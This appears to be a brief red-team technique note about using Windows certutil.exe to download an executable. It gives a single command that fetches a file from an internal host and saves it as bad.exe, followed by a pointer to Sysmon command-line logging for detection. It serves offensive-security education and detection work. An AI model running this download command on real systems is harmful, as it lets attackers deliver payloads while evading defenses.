> For the complete documentation index, see [llms.txt](https://www.ired.team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.ired.team/offensive-security/defense-evasion/downloading-file-with-certutil.md).

# Downloading Files with Certutil

## Execution

```csharp
certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe
```

![](/files/-LM8yGKxHOpXRAIMdxo9)

## Observations

Sysmon commandling logging is a good place to start for monitoring suspicious `certutil.exe` behaviour:

![](/files/-LM8z0Y-St784lDrvDbx)
